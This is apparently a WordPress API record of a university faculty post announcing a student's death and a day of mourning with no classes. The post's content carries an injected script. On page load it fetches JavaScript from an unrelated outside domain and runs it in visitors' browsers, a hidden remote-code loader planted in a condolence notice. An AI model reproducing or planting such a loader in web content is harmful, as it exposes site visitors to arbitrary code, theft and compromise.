{"id":643,"date":"2021-04-20T22:28:13","date_gmt":"2021-04-21T01:28:13","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=643"},"modified":"2025-06-21T11:45:44","modified_gmt":"2025-06-21T14:45:44","slug":"21-de-abril-dia-de-duelo","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2021\/04\/20\/21-de-abril-dia-de-duelo\/","title":{"rendered":"21 de Abril D\u00eda de Duelo"},"content":{"rendered":"\n<p>Con gran pesar e inmenso dolor, lamentamos informar que hoy (20\/04) ha fallecido una querida estudiante de la carrera Dise\u00f1o Industrial, Camila S\u00e1nchez \u2026. muy triste noticia para la instituci\u00f3n.<br>Por tal motivo, el Se\u00f1or Decano nos acaba de informar que se declara un d\u00eda de duelo sin actividades ni administrativas ni acad\u00e9micas en la FAUD para el mi\u00e9rcoles 21\/04.<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Con gran pesar e inmenso dolor, lamentamos informar que hoy (20\/04) ha fallecido una querida estudiante de la carrera Dise\u00f1o Industrial, Camila S\u00e1nchez \u2026. muy triste noticia para la instituci\u00f3n.Por tal motivo, el Se\u00f1or Decano nos acaba de informar que se declara un d\u00eda de duelo sin actividades ni administrativas ni acad\u00e9micas en la FAUD<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2021\/04\/20\/21-de-abril-dia-de-duelo\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,16,9,7,8],"tags":[],"class_list":["post-643","post","type-post","status-publish","format-standard","hentry","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud","category-vida-universitaria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/643","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=643"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/643\/revisions"}],"predecessor-version":[{"id":827,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/643\/revisions\/827"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=643"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}